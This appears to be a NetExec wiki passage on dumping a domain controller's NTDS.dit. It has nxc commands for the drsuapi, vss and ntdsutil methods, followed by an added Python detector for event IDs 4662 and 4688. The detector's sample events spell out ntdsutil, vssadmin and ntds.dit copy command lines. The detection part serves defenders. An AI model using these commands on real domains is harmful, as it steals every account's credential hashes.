Dump NTDS.dit
Requires Domain Admin or Local Admin privileges on the target Domain Controller.
Two methods are available:
(default) drsuapi - Uses the drsuapi RPC interface to create a handle and trigger replication, combined with additional drsuapi calls to convert the resultant linked lists into a readable format
vss - Uses the Volume Shadow Copy Service
nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' --ntds
nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' --ntds --users
nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' --ntds --users --enabled
nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' --ntds vss
There is also the ntdsutil module, which uses ntdsutil to dump NTDS.dit and the SYSTEM hive and parses them locally with secretsdump.py.
nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' -M ntdsutil
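For defenders, each of the three paths above (drsuapi, vss, ntdsutil) leaves a different trace on the domain controller. The following is an added detection example, not part of NetExec or the original page: it flags directory replication requested by a non-DC account (Security event 4662) and shadow-copy or ntdsutil command lines (event 4688). The normalized field names, the `KNOWN_DCS` inventory and the sample events are assumptions constructed for illustration.

```python
import re

# Control-access-right GUIDs: DS-Replication-Get-Changes and
# DS-Replication-Get-Changes-All (logged in the Properties field of event 4662).
REPL_GUIDS = ("1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
              "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2")

# Assumption: site-specific inventory of DC machine accounts allowed to replicate.
KNOWN_DCS = {"DC01$", "DC02$"}

# Command-line patterns for the vss and ntdsutil paths (event 4688).
CMD_RULES = [
    ("ntdsutil_ifm", re.compile(r"\bntdsutil(\.exe)?\b.*\bifm\b", re.I)),
    ("vss_shadow_create", re.compile(r"\bvssadmin(\.exe)?\s+create\s+shadow\b", re.I)),
    ("ntds_dit_copy", re.compile(r"\b(copy|esentutl)\b.*ntds\.dit", re.I)),
]

def classify(event):
    """Return the names of the rules a normalized event matches."""
    if event["id"] == 4662:
        props = event.get("properties", "").lower()
        requested = any(guid in props for guid in REPL_GUIDS)
        if requested and event["account"].upper() not in KNOWN_DCS:
            return ["replication_by_non_dc"]
        return []
    if event["id"] == 4688:
        cmd = event.get("command_line", "")
        return [name for name, rx in CMD_RULES if rx.search(cmd)]
    return []

# Constructed sample events (hypothetical schema, not captured from a real host).
SAMPLE_EVENTS = [
    {"id": 4662, "account": "UserName", "properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"id": 4662, "account": "DC02$", "properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"id": 4688, "account": "UserName", "command_line": r'ntdsutil.exe "ac i ntds" "ifm" "create full C:\Windows\Temp\dump" q q'},
    {"id": 4688, "account": "UserName", "command_line": "cmd.exe /c vssadmin create shadow /For=C:"},
    {"id": 4688, "account": "UserName", "command_line": r"cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\Windows\Temp\n.tmp"},
    {"id": 4688, "account": "backup_svc", "command_line": "vssadmin list shadows"},
]

def scan(events):
    """Return (index, rule names) for every event that matched a rule."""
    return [(i, hits) for i, e in enumerate(events) if (hits := classify(e))]

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS):
        print(index, SAMPLE_EVENTS[index]["account"], hits)
```

Event 4688 only carries a command line when command-line auditing for process creation is enabled on the domain controller.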
Remember to play this music every time you get DA